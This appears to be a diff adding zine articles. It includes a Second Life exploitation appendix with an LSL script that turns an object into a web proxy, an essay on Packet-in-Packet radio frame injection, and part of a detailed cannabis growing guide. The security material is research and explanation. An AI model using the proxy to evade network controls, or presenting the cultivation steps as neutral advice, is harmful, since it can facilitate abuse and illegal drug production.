+    http://oreilly.com/pub/h/5235
+[8] Ogre exporters,
+    http://www.ogre3d.org/tikiwiki/OGRE+Exporters
+[9] QuickTime exploit granting full access to a users machine,
+    http://securityevaluators.com/content/case-studies/sl/
+[10] Thumann's presentation on possibilities how to exploit Second Life,
+     https://www.blackhat.com/presentations/bh-europe-08/Thumann/
+     Presentation/bh-eu-08-thumann.pdf
+[11] OpenMetaverse Library for Developers,
+     http://lib.openmetaverse.org/wiki/Main_Page
+
+------[ A. Appendix
+
+[A. 1] LSL script which requests an publicly accessible URL from the
+current SIM it is located on, and answers any proxies HTTP requests by
+accessing the public URL, suffixed with "/url=<some URL>" where "some URL"
+represents a web address. The script fetches 2k of the content and then
+sends it back to the browser.
+
+key uReq;
+key sReq;
+
+default
+{
+    state_entry()
+    {
+        llRequestURL();
+    }
+
+    changed(integer change)
+    {
+        if (change & CHANGED_INVENTORY) llResetScript();
+    }
+
+    http_request(key id, string method, string body)
+    {
+        if (method == URL_REQUEST_GRANTED) {
+            llOwnerSay(body);
+            return;
+        }
+        if (method == "GET") {
+            uReq = id;
+            list pURL = llParseString2List(
+                llGetHTTPHeader(id, "x-query-string"), ["="], []);
+            if (llList2String(pURL, 0) == "url")
+                sReq = llHTTPRequest(llList2String(pURL, 1),
+                    [HTTP_METHOD, "GET"], "");
+        }
+    }
+    http_response(key request_id,
+        integer status,
+        list metadata,
+        string body)
+    {
+        if (sReq == request_id) llHTTPResponse(uReq, 200, body);
+    }
+}
+
+
+|=[ 0x06 ]=---=[ How I misunderstood digital radio; or,
+                 "Weird machines" are in radio, too! - M.Laphroaig
+                                                       pastor@phrack ]--=|
+
+                          ...there be bytes in the air
+                             and Turing machines everywhere
+
+When one lays claim to generalizing a class of common misconceptions,
+it is fitting to start with one's own.  These are the things I used to
+believe about digital radio -- or, more precisely, would not have
+questioned if explicitly presented with them.
+
+=== Wishful thinking ===
+
+The following statements are obviously related and mutually
+reinforcing:
+
+1. Layer 1 delivers frames to Layer 2 either fully intact frames
+   exactly as transmitted by a peer in their entirety, or slightly
+   corrupted versions of such frames if CRC checking in Layer 1 is
+   disabled, as it sometimes is for sniffing.
+
+2. In order to be received at Layer 1, a frame must be transmitted
+   with proper encapsulation by a compatible Layer 1 transmitter using
+   the exact same PHY protocol. There is no substitution in commodity
+   PHY implementations for the radio chip circuitry activated when the
+   chip starts transmitting a queued Layer 2 frame, except by use of
+   an expensive software defined radio.
+
+3. Layer 1 implementations have means to unambiguously distinguish
+   between the radio transmission that precedes a frame -- such as the
+   frame's preamble -- and the frame's actual data. One cannot be
+   mistaken for another, or such a mistake would be extremely rare and
+   barely reproducible.
+
+4. Should a receiver miss the physical beginning of a frame
+   transmission on the air due to noise or a timing problem, the rest
+   of the transmission is wasted, and no valid frame could be received
+   at least until this frame's transmission is over.
+
+For Layer 1 injection, this would imply the following limitations:
+
+a. In order to successfully "inject" a crafted Layer 1 frame (that is,
+   to have it received by the target) the attacker needs to (1) build
+   the binary representation of the full frame in a buffer, (2)
+   possess a radio capable of transmitting buffer binary contents, and
+   (3) instruct the radio to transmit the buffer, possibly bypassing
+   hardware or firmware implementations of protocol features that may
+   alter or side-effect the transmission.
+
+b. In particular, the injecting radio must perfectly cooperate by
+   producing the proper encapsulating physical signals for the
+   preamble, etc., around the injected buffer-held frame. Without such
+   cooperation, injection is not possible.
+
+c. Errors due to radio noise can only break injection.  The injecting
+   transmission, as a rule, needs to be more powerful to avoid being
+   thwarted by ambient noise.
+
+d. Faraday cages are the ultimate protection against injection, as
+   long as the nodes therein maintain their software and hardware
+   integrity, and do not afford any undue privileges to the attacker.
+
+A high-level summary of these beliefs could be stated like
+this: the OSI Layer 1/Layer 2 boundary in digital radio is a _validity
+and authenticity filter_ for frames. In order to be received, a frame
+must be transmitted in its entirety via an "authentic" mechanism, the
+transmitting chip's logic going through its normal or nearly normal
+state transitions, or emulated by a software-defined radio.
+
+Each and every one of these is _false_, as demonstrated by the
+existence of Packet-in-Packet (PIP) [1,2] exploits.
+
+=== A Packet Breaks Out ===
+
+On a cold and windy February 23rd of 2011, my illusions came to an
+abrupt end when I saw the payload bytes of an 802.15.4 frame's data
+--- transmitted inside a valid packet as a regular payload ---
+received as a frame of its own, reproducibly.
+
+The "inner" packet, which I believed to be safely contained within the
+belly of the enclosing frame would occasionally break out and arrive
+all by itself, without any sign of the encapsulating packet.
+
+Every once in a while, there was no whale, just Jonah. It was a very
+unwelcome miracle for someone who believed he could be safe from even
+SDR-wielding attackers inside a cozy Faraday cage, as long as his
+utopian gated community had no compromised nodes.
+
+Where was my encapsulation now? Where was my textbook's OSI model?
+
+Lies, all lies. Sweet illusions shattered by cruel Packet-in-Packet,
+the textbook illusion of neat encapsulation chief among them. How the
+books lied.
+
+=== Packet-in-Packet: a miracle explained ===
+
+The following is a typical structure of a digital radio frame
+as seen by the radio:
+
+------+----------+-----+-------------------------------+-----+------
+noise | preamble | SFD | L2 frame reported by sniffers | CRC | noise
+------+----------+-----+-------------------------------+-----+------
+
+The receiving radio uses the preamble bytes to synchronize itself, at
+the same time looking for SFD bytes digitally. Once a sequence of SFD
+bytes matches, the radio starts treating further incoming bytes as the
+content of the frame, saving them and feeding them into its checksum
+computation.
+
+Consider the situation when the "L2 payload bytes" transmitted after
+the SFD themselves contain the following, say, as a valid payload of
+a higher layer protocol:
+
+---------+-----+--------------------+--------------------------------
+preamble | SFD | inner packet bytes | valid checksum for inner packet
+---------+-----+--------------------+--------------------------------
+
+If the original frame's preamble and SFD are intact, all of the above
+will be received and passed on to the driver and the OS as regular
+payload bytes as intended.
+
+Imagine, however, that the original SFD is damaged by noise and missed
+by the radio. Then the initial bytes of the outer frame will be
+interpreted as noise, leading up to the embedded "preamble" and "SFD"
+of the would-be payload. Instead, these preamble and SFD will be taken
+to indicate an actual start of a real frame, and the "inner" packet
+will be heard, up to an including the valid checksum.  The following
+bytes of the enclosing frame will again be dismissed as noise, until
+another sequence of "preamble + SFD" is encountered.
+
+Thus, due to noise damaging the real SFD and the receiver's inability
+to tell noise bytes from payload bytes except by matching for an SFD,
+the radio will occasionally receive the inner packet -- precisely as
+if it were sent alone, deliberately.
+
+Thus a remote attacker capable of controlling the higher level
+protocol payloads that get transmitted over the air by one of the
+targeted radios on the targeted wireless network is essentially
+capable of occasionally injecting crafted Layer 1 frames -- without
+ever owning any radio or being near the targeted radios' physical
+location.
+
+Yes, Mallory, there is such a thing as Layer 1 wireless injection
+without a radio. No, Mallory, a mean, nasty Faraday cage will not
+spoil your holiday.
+
+=== The reality ===
+
+Designers of Layer 2 and above trust Layer 1 to provide valid or
+"authentic" objects (frames) across the layer boundary.  This trust is
+misplaced.
+
+There are two factors that likely contribute to it among network
+engineers and researchers who are not familiar with radio Layer 1
+implementations but have read driver and code in the layers above.
+
+Firstly, the use of the CRC-based checking throughout the OSI mode
+layers likely reinforces the faith in the ability of Layer 1 to detect
+errors -- any symbol errors that accidentally corrupt the encapsulated
+packet's structure while on the wire.
+
+Secondly, the rather complex parsing code required for Layer 2 and
+above to properly de-encapsulate respective payloads may lead its
+readers to believe that similarly complex algorithms take place in
+hardware or firmware in Layer 1.
+
+However, L1 implementations are neither validity, authenticity, or
+security filters, nor do they maintain complex enough state or context
+about the frame's bytes they are receiving.
+
+Aside from analog clock synchronization, their anatomy is nothing more
+than that of a finite automaton that pulls bytes (more precisely,
+symbols of the code that encodes the transmitted bytes, which differ
+per protocol, both in bits/symbol and in modulation) out of the air,
+continually.
+
+The inherently noisy RF medium produces a constant stream of symbols.
+The probability of hearing different symbols is actually non-uniform
+and depends on the details of modulation and encoding scheme, such as
+its error-correction.
+
+As it receives the symbol stream, this automaton continually compares
+a narrow window within the stream against the SFD sequence known to
+start a frame. Once matched by this shift register, the symbols start
+being accumulated in a buffer that will eventually be checksummed and
+passed to the Layer 2 drivers.
+
+Beyond the start-of-frame matching automation, the receiver has no
+other context to determine whether symbols are in-frame payload, our
+out-of-frame noise. It has no other concept of encapsulation or frame
+validity.  A digital radio is just a machine for pulling bytes out of
+the air.  It has weird machines in that same way -- and for the same
+reasons -- that a vulnerable C program has weird machines.
+
+Such encapsulation based on such a simple automaton is easily and
+frequently broken in presence of errors. All that is needed is for the
+chip's idea of the start-of-frame sequence -- typically, some of the
+preamble + a Start of Frame Delimiter, a.k.a. Sync, or just the
+latter where the preamble is used exclusively for analog
+synchronization -- to not match, for the subsequent payload bytes to be
+mistaken for the start-of-frame sequence or noise.
+
+In fact, to mislead the receiving automaton to the _intended meaning_
+of symbols (or bytes they are supposed to make up or come from) no
+crafting manipulation is necessary: the receiving machine is so simple
+that _random noise_ alone provides sufficient "manipulation" needed to
+confuse its state and allow for packet-in-packet injection.
+
+Thus injection for attackers without an especially cooperative radio
+or in fact any radio at all -- so long as the attacker can leverage
+some radio near the target to produce a predictable stream of symbols
+-- is enabled by broken encapsulation.
+
+=== What does this remind me of? ===
+
+I remember the first time I witnessed a buffer overflow exploit, when
+my Internet-facing Linux box, name Miskatonic, was exploited.  Whoever
+did that also opened a whole new world to me, and I'll be happy to
+repay that debt with a beer should we ever meet in person.
+
+At that time, I was a fairly competent C programmer, but I saw the
+world in terms of functions that called other functions.  Each of
+these functions returned after being called to whichever address it
+had been called from. I thought that the only way for a piece of code
+to ever get executed was to be inside a function called at some point.
+
+In other words, I regarded C functions as "atomic" abstractions.  Even
+though I implemented simple recursion and mutually recursive functions
+via my own stacks a few times, it never occurred to me that a real
+call stack could be anything other than a neat and perfect data
+structure with "push", "pop", and referencing of variable slots.
+
+Beware layers of abstractions. Take their expected, specified
+operation on faith, and they will appear real. It is tempting to trust
+a lower abstraction layer to provide _only_ the valid data structures
+your next layer expects to receive, to assume that the lower layer's
+designers already took responsibility for it. It is so tempting to
+limit your considerations to the detail and complexity of the layer
+you are working in.
+
+Thus the layers of abstraction become boundaries of competence.
+
+This temptation is overpowering on well-designed, abstraction-oriented
+environments, where you lack any legal or effective means of PEEK-ing
+or POKE-ing the underlying layers.  Dijkstra decried BASIC as a
+mind-mutilating language, but most real BASICs had PEEK and POKE to
+explore the actual RAM, and one sooner or later found himself
+wondering what they did. I wonder what Dijkstra would have said about
+Java, which entirely traps the mind of a programmer in its
+abstractions, with no hint of any other ways or idioms of programming.
+
+
+=== How we could have avoided falling for it ===
+
+The key to understanding this design problem is the incorrect
+assumptions about how input is handled, in particular, of how it is
+handled as a language, and the machine that handles it.
+
+The _language-theoretic approach_ to finding just such misconceptions
+and exploitable bugs based on it was developed by Len Sassaman
+and Meredith L. Patterson. Watch their talks [3,4] and look for
+upcoming papers at http://langsec.org
+
+Such a language-theoretic analysis at L1 would have revealed this
+immediately. Valid frames are phrases in the language of bytes that a
+digital radio continually pulls out of the air, and the L1 seen as an
+automaton for accepting valid phrases (frames) should reject
+everything else.
+
+The start-of-frame-delimiter matching functionality within the radio
+chip is just a shift register and a comparison circuit -- too simple
+an automaton, in fact, to guarantee anything about the validity of the
+frame. With this perspective, the misconception of L2 expecting frame
+encapsulation and validity becomes clear, almost trivial. The key to
+finding the vulnerability is in choosing this perspective.
+
+Conversely, there is no nicer source of 0-day than false assumptions
+about what is on the other side of an interface boundary of a
+textbook-blessed design. The convenient fiction of classic
+abstractions leads one to imagine a perfect and perfectly trustworthy
+machine on the other side, which takes care of serving up only the
+right kind of inputs to one's own layer. And so layers of abstraction
+become boundaries of competence.
+
+References:
+
+[1] Travis Goodspeed, Sergey Bratus, Ricky Melgares, Rebecca Shapiro, 
+    Ryan Speers, 
+   "Packets in Packets: Orson Welles' In-Band Signaling Attacks for 
+    Modern Radios", 
+    USENIX WOOT, August 2011,
+    http://www.usenix.org/events/woot11/tech/final_files/Goodspeed.pdf
+
+[2] Travis Goodspeed,
+    Remotely Exploiting the PHY Layer,
+    http://travisgoodspeed.blogspot.com/2011/09/
+      remotely-exploiting-phy-layer.html
+
+[3] Len Sassaman, Meredith L. Patterson,
+    "Exploiting the Forest with Trees",
+    BlackHat USA, August 2010,
+    http://www.youtube.com/watch?v=2qXmPTQ7HFM
+
+[4] Len Sassaman, Meredith L. Patterson,
+   "Towards a formal theory of computer insecurity: a language-theoretic 
+    approach"
+    Invited Lecture at Dartmouth College, March 2011,
+    http://www.youtube.com/watch?v=AqZNebWoqnc
+
+
+|=[ 0x07 ]=--=[ The 1130 Guide to Growing High-Quality Cannabis - 1130 ]-=|
+
+So you wanna grow marijuana? You wanna get high off your own buds?  Well
+this guide will surely teach you how. I'll assume you're already somewhat
+familiar with Mary-Jane, so I won't explain all the jargon in deep detail.
+
+
+Table of Contents
+
+0x00: General Botany -- basic plant knowledge
+0x01: Environment -- air, temperature, and humidity
+0x02: Container -- size and shape
+0x03: Water -- temperature and filtering
+0x04: Nutes -- plant food
+0x05: Conductivity and pH -- don't burn the roots
+0x06: Hydroponics -- how-to hydro
+0x07: Light -- which and why
+0x08: Cloning -- make 'em root
+0x09: Vegging -- big 'n' bushy
+0x0A: Flowering -- dense and dank
+0x0B: Harvest -- chop, dry, and cure
+0x0C: Extracts -- smoke, vape, and cook
+0x0D: Signs and Symptoms -- oh noes, wtf mang!
+
+
+
+0x00: General Botany
+
+If you've never grown before, growing cannabis can be difficult. Really
+though, it just depends on how much time you put in. As long as you check
+in on your plants 3-4 times a day, you'll begin to learn enough about them
+to grow some really dank buds. But to get you started, here are a few
+things you should know.
+
+Plants need light, water, air, and food to grow. A lack of any one of these
+at best will slow its growth and at worst will cause part or all of it to
+die. Light is generally the most limiting factor in determining a plant's
+growth rate, but that assumes all other factors are maxed. Plants absorb
+water and nutrients through their roots and carbon dioxide (CO2) through
+their leaves. They also need a bit of oxygen which they absorb through both
+leaves and roots.
+
+Chloryphyll is a chemical in their leaves that's used as a catylyst with
+energy from light to convert CO2 and water into sugars and oxygen.
+Chloryphyll-a is also what gives leaves their green color, while
+Chloryphyll-b is responsible for the yellow color of leaves.
+
+Plants need oxygen in order to burn energy to stay alive and grow, like we
+do, but plants produce much more oxygen than they consume. Plants are not
+able to move enough oxygen from the leaves down to the roots, so roots must
+have access to some oxygen in order to stay alive. When soil dries, air
+fills the space in the ground, and so soil must dry enough so that the
+roots can have air to breathe.
+
+Cannabis has two main kinds of roots. There are the taproots which can grow
+very large and persist through dryness, and there are the feeder hairs.
+Feeder hairs will not survive very long without water, but since the roots
+need air to breathe the soil must dry out enough between waterings. Thus,
+it is important to let soil dry enough so it is not wet but still retains
+enough moisture to keep the feeder hairs alive. If they die, they must grow
+back before the plant can begin absorbing more nutrients. An easy way to
+tell if the soil is properly dry is if the color is still dark (not a
+lighter brown as when the dirt is "bone-dry") but the soil does not stay
+clumped together as it does when wet.
+
+Plants require three macronutrients to survive: N-P-K, or Nitrogen
+(Nitrates), Phosphorus (Phosphates), and Potassium (Potash). Nitrogen is
+primarily responsible for the green color in vegetative matter. It is not
+as important in fruits and flowers. Phosphorus is needed for root growth
+and is also the primary nutrient for fruits and flowers. Potassium is used
+throughout the plant to provde support; more Potassium means stronger,
+stiffer stems and branches which provide better support for dense buds.
+
+
+0x01: Environment
+
+Although cannabis grows in pretty much any condition (it is a weed, after
+all), optimal conditions produce optimal growth rates. Certain strains may
+be more picky than others, but generally you want the following:
+
+Humidity
+ Cloning: 90-100%
+ Vegging: 50-80%
+ Flowering: 40-50%
+
+Temperature should always be 68-75F (20-24C). Lower temps increase
+humidity, and higher temps reduce humidity. Plants drink through their
+leaves as well as their roots, and they need humidity to do this. They also
+transpire through their leaves when temperatures are too high. Keep this in
+mind when checking your levels and diagnosing your plants. For instance, if
+the environment's been hotter than ideal and the air is dry, a small
+watering in between regular waterings may be necessary to protect the roots
+near the topsoil and prevent the plant from going into shock.
+
+Air flow is very important. Basically you want to see the leaves moving at
+all times. Proper air flow does two things: it moves the air right around
+the leaves so the plant always has access to CO2, and the continuous leaf
+movement causes the plant to react and grow stronger stems which you need
+to support those massively dense buds you wanna grow. Too much airflow
+isn't a big deal as long as the plants aren't falling over. Technically,
+moving air will reduce air pressure and thus temperature will drop
+slightly, so if heat is a problem for you consider keeping your fan on a
+higher setting. But the more air flow, the more the plants transpire, and
+the more water they'll need.
+
+
+0x02: Container
+
+Cannabis needs a proper container to provide optimal root growth. In shape,
+the best container is wider than it is tall. If growing outdoors, a raised
+bed of good soil does wonders. Indoors, wide pots or trays work very well.
+You'll need to decide if you want to grow in soil or a hydroponic medium.
+There are pros and cons to both. Soil with compost is ideal for outdoor
+organic growing -- after preparation nature helps keep the roots healthy,
+and with a good compost mix most of the time plain water is all that's
+needed. If growing in pots, soil is still a good choice, but you will
+definitely have to supplement the water with additional nutrients, or you
+can use dry fertilizers that you work into the topsoil.
+
+Indoor growing is much different than outdoor, and growing hydroponically
+adds a-whole-nother set of variables. If you're lazy, you have two options:
+grow in soil (soil is very forgiving), or build an automated setup. An
+automated setup is one that takes care of watering for you, so all you need
+to do is regular checkups, trimming, and checking on your reservoir.  I'll
+go into detail about different hydroponic setups later on.
+
+
+0x03: Water
+
+Yes, a whole section on water, albeit a short one. Water temperature should
+be a little less than air temperature, although the roots will tolerate
+pretty cold water. Never give your plants water that's less than 50F (10C);
+you'll risk shocking the roots and stunting growth for a few days.
+
+Water should be clean of excess salts, especially chlorine and chloramines.
+Soil gardens will tolerate the chlorines much better than hydro, but you
+should really get a water filter. A carbon filter is usually fine, but if
+your water source is really bad you might want to consider Reverse-Osmosis.
+RO filters are expensive, but they also reduce the conductivity of the
+water to the lowest possible levels, allowing you to add more nutrients
+without burning the roots. Carbon filters are pretty cheap, and you could
+even use a regular drinking water filter.
+
+
+0x04: Nutes
+
+I do love organic; there's nothing quite like the taste of organically
+grown buds, but I do find that synthetic nutrients give amazing results.
+If you're not growing for personal use, synthetics are cheaper and can give
+very high yields. Either way, I'd recommend using a premade blend made by a
+name-brand company -- when you're starting out it's just not worth trying
+to play chemist, just get the kit. I use liquid nutrients for both hydro
+and soil, but dry feeds will work in soil and any non-recirculating hydro
+setup (e.g. feed and drain in coco). Liquid nutrients are designed to be
+instantly accessible by the plants, whereas dry feeds are usually
+time-release.
+
+Here are some rough empirical NPKs:
+Cloning: 1-3-4
+Vegging: 3-2-4
+Flowering: 1-4-5
+
+Aside from Nitrogen, Phosphates, and Potash, plants also need
+micronutrients. Iron, Calcium, and Magnesium and at the top, with still
+many others required to proper growth. Most organic mixes will have these
+even though they won't specify on the bottle, but if you're growing with
+synthetics you will have to supplement. Molasses has Fe, Ca, and Mg, and
+the sugar content helps both feed microbials and rinse out the growing
+medium. Various Vitamin B-1 mixes will have most necessary micronutrients.
+Cal-Mag supplements are good too, but be aware when using in conjunction
+with molasses so you don't overfeed.
+
+In general, I recommend starting with less than half of the listed usage on
+the nutrient containers and then increasing as you see fit. It's a lot
+easier to see that your plants' leaves are a lighter green than you would
+want and then to increase the Veg mix than to use too much and burn your
+plants and have to start all over. If growing in soil, try starting at a
+quarter-strength and using it with every watering. Increase as necessary to
+compensate for light color and plant size.
+
+
+0x05: Conductivity and pH
+
+Soil/medium pH and water pH are measured differently, but as long as you
+regulate the water pH there's no reason to worry about the soil. If you can
+afford it, I highly recommend getting a pH/Conductivity meter; some also
+measure PPM (parts per million), though it's usually a conversion from
+conductivity (measures in milliSiemens). I don't even pay attention to the
+usage on the nutrient bottle anymore, but I fill my resevoir according to
+the conductivity. I find it to be much more accurate than measuring the
+volume of water in gallons and using measuring cups for nutrients.
+
+Required pH will depend entirely on your medium. In pure hydro/aero setups,
+this is 5.6-5.8 for veg and 5.8-6.0 for flowering. In coco coir, this is a
+bit higher: 6.0-6.2 for veg and 6.2-6.5 for flowering. In soil, it really
+depends on what's in the mix, but it usually ranges in 6.5-6.8 for veg and
+6.8-7.0 for flowering. Cloning should be in between the values for veg and
+flowering (5.8 for hydro, 6.2 for coco, and 6.8 for soil).
+
+pH mostly affects the nutrients that are available for the roots to absorb.
+The lower ranges increase nitrogen uptake, and the higher ranges increase
+phosphates. Since nitrogen is more important for veg and phosphate for
+flowering, this explains why the ranges are different for each phase. If pH
+varies by a point or two, it's not a big deal, but too strong in either
+direction can cause root-burn as well as deficiencies in both macro and
+micronutrients.
+
+Conductivity requirements depend on the age/size of the plant. I suggest
+starting with these maximums and steadily increasing for larger containers
+so long as no signs of problems occur: For soil/hydro: Cloning: 0.8/1.2 mS
+Vegging: 1.6/2.0 mS (containers up to 2 gallons) Flowering: 2.4/3.0 mS
+(containers up to 5 gallons)
+
+In general, conductivity >3.0 mS can be dangerous, so above that range only
+increase once/week and only 0.1-0.2 mS at a time.
+
+
+0x06: Hydroponics
+
+Hydro is awesome. Plants have the ability to grow continuously and at a
+very rapid pace, but they need extra care, and problems with nutrients or
+pH often occur so quickly that by the time you realize there's a problem
+it's usually too late. For first-timers, I'd recommend coco coir. If you're
+ambitious, consider building your own aeroponic system. In general, there
+are two types of systems: recirculating, and drain-to-waste. I'll list each
+medium and give some details about which system is appropriate. For
+recirculating, you'll want to drain and change your reservoir at least once
+a week in addition to topping it off regularly, whereas if using a
+drain-to-waste system only topping off is necessary.
+
+Coco coir:
+Coco coir is a part of the coconut husk that by itself can take years to
+break down, hence its designation as a hydroponic medium. It's commonly
+used as bedding for worms. It's highly absorbent and expands to sometimes
+five times its dry volume when wet. It also holds air very well. Coco coir
+is nice because it's very difficult to over-water your plants with it since
+it holds so much air, and the shrinking in between waterings adds
+additional air to the medium.  Drain-to-waste is best for coco because bits
+of the medium will also drain out, and you don't want these clogging up
+your pump or lines. Depending on the size of the container and plants, coco
+requires 1-3 feedings/day.
+
+Rockwool:
+Rockwool is woven fibers of rock made by Grodan. Rockwool is very
+absorbent, and it's easy to see when it is drying up. Like coco, rockwool
+is very porous and holds air very well. I prefer rockwool for cloning.  Ebb
+and flow (flood and drain, recirculating) or drain-to-waste both work well
+with rockwool. Fast growing plants may require up to 5-6 waterings/day
+depending on the size of medium. Timers come in handy here. For ebb and
+flow, flood for 10-15 minutes, then drain. For drain-to-waste, feed as
+needed, allowing 5-10% of the water feed to drain, ensuring complete
+saturation of the medium.
+
+Hydroton, Perlite, or other Pebbles:
+Hydroton is a manufactured expanded-clay medium. Perlite is a volcanic
+glass/rock, also expanded, and very porous. Both are better than filling a
+container with rocks/pebbles, although you could do that if you're really
+trying to save money. Hydroton and perlite do hold some water, but they
+drain very quickly and so should not be left without water for an extended
+period of time.
+Ebb and flow or continuous drip work well here. Drain-to-waste is very
+inefficient since the medium doesn't hold water for very long, and so very
+accurate timings would be needed to prevent excessive waste. If using a
+continuous drip, consider aerating the reservoir with an air pump to ensure
+roots have access to oxygen. For ebb and flow, flood at least 1-2 times per
+hour with no more than 15 minutes of dry time.
+
+Aeroponic
+Aeroponic growing is sweet. There's little-to-no chance of overwatering or
+underwatering (unless your pump breaks) as the roots always have access to
+water, nutrients, and air. For this, you'll need to contruct a sprayer
+assembly inside a reservoir. Rubbermaid containers are cheap and work well.
+cut 2" holes in the lid (or whatever size gasket you have) and fill the
+holes with cylindrical foam gaskets to hold the plants. Plant roots hang
+down freely into the reservoir. Construct the sprayer assembly using PVC
+piping and small 180- and 360-degree sprayers depending on placement.  The
+assembly should be as short as possible but have at least 2-3 inches above
+the pump and below the sprayers at the top. Use a submersible pump, and
+fill the reservoir to above the pump but below the sprayers. You will need
+an NFT (Nutrient Film Technique) style timer for the pump. These typically
+operate on cycles of 1 minute on and 4 minutes off or 3 minutes on and 5
+minutes off. I've seen cheap adjustable ones on Ebay. You can also make one
+yourself with an arduino and a relay pretty easily. Just make sure that the
+cycle allows for time in between sprayings to provide the roots access to
+air. An air pump here also works well.
+
+Deep Water Culture:
+DWC is simple, easy, and efficient. It's basically an aeroponic system but
+with a much deeper reservoir, allowing the roots to grow down into the
+nutrient solution. A sprayer system similar to the aeroponic one described
+above can be used, or a top-drip works as well. For a top-drip, fill a pot
+with Hydroton or another medium, and set the pump to continuously pump feed
+from the reservoir underneath to the pot on top. An aerator for the
+nutrient solution is necessary here so that roots hanging down into the
+solution have access to air.
+
+Aquaponic:
+When I first read about this I was blown away. Aquaponic combines hydro
+with an aquarium. Basically, you have a large reservoir with a DWC setup,
+but additionally you have fish living inside as well. The fish and plants
+eat each other's waste (just like in nature!), and they both feed on fish
+meal which is one of the most common organic plant foods. Guppies are
+usually the best choice for fish since they're cheap and reproduce quickly,
+although any freshwater fish will work.
+
+
+0x07: Light
+
+Light is arguably the most important factor in growing. Typically it is the
+most limiting factor. There are many different types of lights, and each
+has its own benefits. Halogen lights are most common in professional grows,
+fluorescents are cheap and efficient, and LEDs are gaining popularity.
+Here's some info on each:
+
+Good ol' incandescents:
+These provide light, they sure do, but they also provide heat. They're best
+used as supplemental light when you need the added heat as well, otherwise
+just go with a fluorescent.
+
+Fluorescents:
+Fluorescents come in many sizes, shapes, and spectrums. Spectrum is rated
+by color temperature in Kelvins. A 6500K light is usually recommended as it
+provides the closest spectrum to the Sun's white light. In general, the
+higher the K, the better. Fluorescents are great for all phases of growth,
+but they're best suited for clones, mothers, and vegetative plants when you
+have an HPS available for flowering. Even so, they're always great to
+consider as supplementals since they're so cheap and efficient.
+
+Metal-Hallides:
+MH Halogens are extremely effective for the vegetative phase. They work for
+flowering as well, but are not as effective as HPS lights. A 400-watt MH
+can cover a 3x3ft area, 600-watt covers 4x4', and 1000-watt covers 6x6'.
+Of course, additional light is nice.
+
+High-Pressure Sodium:
+HPS lights are best for flowering. They have a spectrum more concentrated
+in the red/yellow end which plants tend to absorb more during the autumn
+season (when flowering). In every test I've ever seen, HPS lights
+outperform all other lights in flowering production, watt for watt (or
+lumen-equivalent in the case of LEDs and fluorescents). HPS lights also
+generate a lot of heat, so keep that in consideration.
+
+LEDs:
+LED lights are extremely efficient, but they're also expensive. In the long
+run, they're worth it, but they can take a few cycles to pay themselves
+off. LEDs come in combinations of red and blue (more red for flowering),
+and sometimes other colors are added as well. If space permits, I'd still
+recommend using an HPS along with LEDs for flowering, but LEDs are great
+for the vegetative phase.
+
+With all lights, the inverse-square law applies, meaning if you cut the
+distance from light to plant in half, you quadruple the light received, and
+vice versa, if you double the distance you quarter the light received. Too
+much light can be a bad thing. Plants that are too small or do not have
+enough water/nutrients to use will not be able to use all the light that
+hits them and their leaves will burn. Also, there are areas close to the
+lights that are called hotspots. These are areas where reflected light is
+concentrated, and plants in these spots are more likely to burn since the
+light there is very intense. The rule-of-thumb is use your hand: if it's
+too hot for you, it's too hot for the plants.
+
+
+0x08: Cloning
+
+Cloning is the process of taking cuttings from a "mother" and allowing
+these cuttings to root into plants of their own. In addition to your mother
+plant, you'll need a sharp pair of snips, a humidity dome, cloning medium,
+filtered water, cloning gel/powder (optional), nutrients (optional but
+recommended), and a light that will be on 24-hours/day (a single
+fluorescent is sufficient). Here is a step-by-step process:
+
+Prepare your mothers by giving them plain water (along with a flushing
+solution if you like, a bit of molasses works well) at least a day before
+cutting clones. This helps flush out excess Nitrogen so that the clones can
+root more quickly.
+
+Prepare the cloning solution.  This can be plain water, but I like to add a
+mix of flowering nutrients (better than vegging nutrients for rooting,
+nitrogen is bad for cloning) and kelp and algae extracts. Balance the pH of
+the solution according to the medium you're using, and throoughly soak the
+medium.  I use rockwool. Other alternatives are Groplugs, Coco, and soil.
+Any growing medium can work, really.I also like to keep a pool of solution
+in the bottom tray of the humidity dome to help keep the humidity high as
+well as provide food for the plants once they root. You can even allow the
+medium to soak for the first 3-4 days of cloning to help speed up root
+growth, just be sure to drain it after that.
+
+Cut the clones. I've cut both small and tall clones, and the small ones
+work very well too. Leave at least 2" (about 5cm) of stem underneath the
+highest leaves. You can trim leaves off to save space, if you want. This
+allows you to pack more clones inside the dome. Otherwise, I like to leave
+the leaves on (except for the bottom section that's inside the medium). You
+can place the clone directly in the medium, or you can shave and split the
+bottom. Splitting the bottom of the stem and shaving off the outer-layer of
+the bottom of the stem increases the surface area of the cambium layer,
+kind of like a stemcell layer. From here is where the roots grow. Exposing
+more can increase the rooting time by a few days, but often you will get
+much more vigorous root growth. I prefer this method.
+
+Dip the stem tip in cloning gel/powder, if you're using it (I don't), then
+plant the clones inside the medium, and cover the dome. If cutting many
+clones, I like to keep the dome partially covered (for those already
+planted) so they don't start wilting right away.
+
+After they're all planted and the dome is covered, place the dome under a
+light that will be on 24-hours/day. Clones need very little light to root,
+so a single fluorescent is sufficient here, or just some ambient light that
+will not be shut off.
+
+Clones can take anywhere from 5-14 days to root depending on the factors
+discussed above. I like to keep my clones rooting in the dome until their
+root masses are about a foot long, though the plants will still be short.
+This ensures the best chance of avoiding shock when transplanting as well
+as fairly explosive growth within a couple days of transplanting.
+
+
+0x09: Vegging
+
+Once clones have rooted, the vegetative phase begins. Most strains require
+at least 18 hours of light/day to prevent them from flowering, though some
+make require more, up to 24 hours/day. This is the easiest phase to grow in
+since the plants are vigorous and large enough to tolerate shock.
+
+Transplant your clones into the medium of your choice, and begin feeding a
+mild nutrient solution. For soil gardens, plain water can be used for the
+first week. Increase the concentration of the nutrient solution over time
+to accomodate the size of the plant. Consider transplanting to a larger
+container after two weeks of continuous, vigorous growth.
+
+Depending on your setup, you'll want a different target size of your veg
+plants. A sea of green, for instance, requires many plants next to each
+other so that they basically form a horizontal plane across their tops, but
+if you're growing in a small closet with 2-3 plants then you'll probably
+want them as big as they can fit.
+
+There are different stress-techniques used to promote larger growth.
+Topping is one of the most common. Topping entails cutting off the newest
+growth of the highest node, generally without trimming much of the larger
+leaf matter. Topping forces the plant's vascular system to merge at this
+point, causing more growth nodes to be produced here at the top of the
+plant. Topping is a preferred method because the top buds of each branch
+are generally the largest, and more top nodes mean more top nugs.
+
+Another technique used is bending. Bending entails taking the tallest
+branch of the plant and bending it down and to the side, usually tying it
+down with gardening wire or string. Bending exposes more of the lower nodes
+to direct light, causing them to grow larger. It also allows more buds to
+receive direct light, making it another preferred method by many growers.
+
